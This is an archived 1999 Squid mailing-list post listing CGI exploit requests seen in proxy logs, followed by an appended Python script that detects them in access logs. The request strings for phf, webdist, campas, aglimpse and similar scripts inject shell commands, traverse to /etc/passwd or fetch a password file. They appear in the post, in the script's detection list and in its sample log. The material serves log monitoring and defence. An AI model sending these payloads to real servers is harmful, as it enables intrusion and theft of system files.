On Sat, 23 Jan 1999, James Young wrote:
> At 04:45 PM 1/23/99 +1000, mlowe@dataline.net.au wrote:
> >Are there any known exploits for squid? If so where is the list/site
> >located?
I thought I'd mailed this list, but can't find my post. Maybe I didn't.
I have seen the following CGI exploits, many times:
/cgi-bin/phf?Qname=me%0als%20-lFa
/cgi-bin/faxsurvey?ls%20-lFa
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/view-source?../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../../../../../etc/passwd
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc
/cgi-bin/pfdispaly.cgi?'%0Als%20-lFa%20/etc
/_vti_pvt/service.pwd
If the origin server traps these but not x-forwarded-for, it looks like
your Squid machine is the abuser.
PHF was distributed with early Apache and NCSA httpd as a demo CGI script.
Webdist I think is an Irix software update tool. Not sure about the
others; they must be fairly common. _vti_pvt I presume is from NT.
One might consider searching for these when doing log rotation, and
preserving the trail for a bit longer than 36 hours or whatever people
use...
regards
Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
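The log search the post suggests, written out as an added example (not code from the original post or its author): a Python script that reads Squid native-format access.log lines, matches the request path against the CGI probe names and paths listed above, and reports the real client address next to each hit. Keeping these hits from your own Squid log is what lets you answer an origin server's complaint when, as the post notes, their log shows only the proxy's address. The log lines at the bottom are constructed for the example; the Squid native log layout (time, elapsed, client, result code, bytes, method, URL, ident, hierarchy, type) is assumed.

```python
import re
import sys
from urllib.parse import urlsplit, unquote

# CGI program names and paths taken from the list in the post above.
# Matching is done on the decoded request path only, so the query string
# (where the actual command injection or traversal lives) does not need
# to be parsed to recognise the probe.
PROBED_CGI = {
    "phf", "faxsurvey", "handler", "webdist.cgi", "php.cgi", "view-source",
    "htmlscript", "campas", "info2www", "aglimpse", "pfdisplay.cgi",
    "pfdispaly.cgi",  # sic: the misspelled name appears in the post's list
}
PROBED_PATHS = {"/_vti_pvt/service.pwd"}

# Squid native access.log (assumed layout):
# time elapsed client code/status bytes method URL ident hierarchy/peer type
SQUID_LINE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+(?P<result>\S+)\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)


def classify_url(url):
    """Return a short reason tag if the URL matches a probe from the post, else None."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    if path in PROBED_PATHS:
        return "vti_pvt"
    segs = path.split("/")
    # /cgi-bin/<name>[/anything]  -- the name is enough to identify the probe
    if len(segs) >= 3 and segs[1] == "cgi-bin" and segs[2] in PROBED_CGI:
        return "cgi:" + segs[2]
    # Generic fallback: dot-dot traversal aimed at /etc/passwd anywhere in the URL
    decoded = unquote(url)
    if "../" in decoded and "/etc/passwd" in decoded:
        return "traversal"
    return None


def scan_lines(lines):
    """Return (client, reason, url) for every log line that matches a known probe."""
    hits = []
    for line in lines:
        m = SQUID_LINE.match(line)
        if not m:
            continue  # not a native-format line; skip rather than guess
        reason = classify_url(m.group("url"))
        if reason:
            hits.append((m.group("client"), reason, m.group("url")))
    return hits


# Constructed sample log: two ordinary requests, three probes from the post's list.
SAMPLE_LOG = """\
917826000.123    245 203.0.113.5 TCP_MISS/200 1234 GET http://www.example.org/index.html - DIRECT/192.0.2.10 text/html
917826001.456    312 203.0.113.5 TCP_MISS/404 512 GET http://www.example.org/cgi-bin/phf?Qname=me%0als%20-lFa - DIRECT/192.0.2.10 text/html
917826002.789    198 203.0.113.7 TCP_MISS/200 2048 GET http://www.example.org/cgi-bin/view-source?../../../../../../../../etc/passwd - DIRECT/192.0.2.10 text/plain
917826003.001    150 203.0.113.9 TCP_MISS/403 300 GET http://www.example.org/_vti_pvt/service.pwd - DIRECT/192.0.2.10 text/html
917826004.500    100 203.0.113.5 TCP_HIT/200 800 GET http://www.example.org/cgi-bin/search?q=linux - NONE/- text/html
"""


if __name__ == "__main__":
    # Usage: python scan.py /var/log/squid/access.log   (no argument: scan the sample)
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for client, reason, url in scan_lines(source):
        print(f"{client}\t{reason}\t{url}")
```

Run it against the rotated log before it is discarded and keep only the printed hits; a few lines per day is cheap to retain well past the 36 hours the post mentions, and the client column is the address the origin server's log will be missing.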
Received on Fri Feb 05 1999 - 17:49:52 MST
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:44:28 MST